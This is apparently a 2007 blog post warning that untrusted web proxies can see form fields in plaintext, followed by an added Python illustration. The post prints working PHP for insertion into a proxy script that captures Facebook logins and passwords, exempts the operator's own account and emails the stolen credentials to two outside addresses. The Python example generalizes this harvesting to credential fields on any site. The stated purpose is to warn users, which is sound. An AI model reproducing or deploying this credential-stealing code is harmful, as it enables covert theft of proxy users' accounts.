When a web proxy is used, everything the browser sends to the target site passes through the proxy server first, and the proxy script sees it in plaintext: the proxy terminates the user's connection and only then opens its own connection to the target, so even an HTTPS target does not hide submitted form fields from the proxy operator. It is therefore possible, and has been demonstrated, for a malicious proxy server to record everything sent through it, including logins and passwords. All it takes is a few lines inserted into the proxy script. This is the code (the proxy script is assumed to hold the requested URL in $_url):

<?php
if (strpos($_url, 'facebook.com') !== false) // checks if the requested url contains "facebook.com"
{
    if ($_REQUEST['email'] != "") // only true if a login form was submitted
    {
        $user = $_REQUEST['email']; // getting the submitted fields
        $pass = $_REQUEST['pass'];
        $not_me = 0;
        // this protects the proxy owner's own account from being logged
        if (strpos($user, 'your_name') !== false or strpos($pass, 'whatever_your_password_is') !== false)
        {
            $not_me = 1;
        }
        else
        {
            mail("send_to_email@whatever.com", "password captured", "website is: $_url , username is: $user , password is: $pass", "From: random_email_address@whatever.com"); // sending to the proxy owner
            mail("send_to_subscriber@whatever.com", "password captured", "website is: $_url , username is: $user , password is: $pass", "From: random_email_address@whatever.com"); // sending to a subscriber
        }
    }
}
?>

This code simply logs the username and password of any proxy user who logs in to Facebook through the proxy (skipping the owner's own account) and emails them to the proxy owner and a second address. Nothing about the target site's own encryption prevents this, because the fields are read at the proxy before the proxy ever contacts the site. A proxy user should never use proxy servers of unknown integrity. If there is no choice but to use an unknown proxy server, do not pass any private information through it. For a list of trusted web proxies, visit: http://www.proxytop.net/
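The following Python script is an added example, not code from the original post. It models what a CGI-style web proxy sees when a login form is submitted through it, generalizes the PHP snippet above from Facebook to any site (any credential-looking field is picked out), and ends with the client-side rule the post recommends: refuse to send private data through a proxy that is not trusted. The field names url, email and pass follow the PHP snippet; the credential field list, the function names and the sample POST body are assumptions of this example, and the sample is constructed.

```python
"""What a web proxy sees, and the check a user can apply before using one.

Added example; not from the original post. The request body below is
constructed. The 'url' field is assumed to be the proxy's own parameter
carrying the target URL, as with the $_url variable in the PHP snippet.
"""
from urllib.parse import parse_qs

# Field names that commonly carry credentials (assumption of this example).
CREDENTIAL_FIELDS = {
    "email", "user", "username", "login",
    "pass", "password", "passwd", "pwd",
}

# Constructed sample: a browser posting a Facebook login through the proxy.
# The target is HTTPS, but the proxy still receives every field in the clear,
# because the browser's request is to the proxy, not to facebook.com.
SAMPLE_POST = (
    "url=https%3A%2F%2Fwww.facebook.com%2Flogin.php"
    "&email=alice%40example.com&pass=hunter2&persistent=1"
)


def proxy_view(raw_post_body):
    """Parse the form body exactly as the proxy script's $_REQUEST would.

    Returns the target URL and every submitted field, all in plaintext.
    """
    parsed = parse_qs(raw_post_body, keep_blank_values=True)
    fields = {k: v[0] for k, v in parsed.items()}
    target = fields.pop("url", "")
    return {"url": target, "fields": fields}


def harvest(view, skip_values=()):
    """The malicious logic from the post, generalized to any target site.

    Picks out non-empty credential-looking fields. skip_values plays the role
    of the $not_me check: submissions containing the proxy owner's own
    username or password are not logged.
    """
    creds = {
        k: v for k, v in view["fields"].items()
        if k.lower() in CREDENTIAL_FIELDS and v != ""
    }
    if not creds:
        return None
    if any(v in skip_values for v in creds.values()):
        return None
    return {"url": view["url"], **creds}


def is_safe_to_proxy(raw_post_body, proxy_trusted=False):
    """Client-side rule from the post: through a proxy of unknown integrity,
    send nothing a malicious operator could harvest."""
    if proxy_trusted:
        return True
    return harvest(proxy_view(raw_post_body)) is None


if __name__ == "__main__":
    view = proxy_view(SAMPLE_POST)
    print("proxy sees:", view)
    print("malicious proxy would log:", harvest(view))
    print("safe through untrusted proxy?", is_safe_to_proxy(SAMPLE_POST))
```

Running it shows the proxy holding the email address and password in the clear alongside an https:// target URL, which is the whole point: the user's TLS session ends at the proxy, so the proxy's own connection to the site protects nothing the proxy itself chooses to keep.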
Sunday, October 21, 2007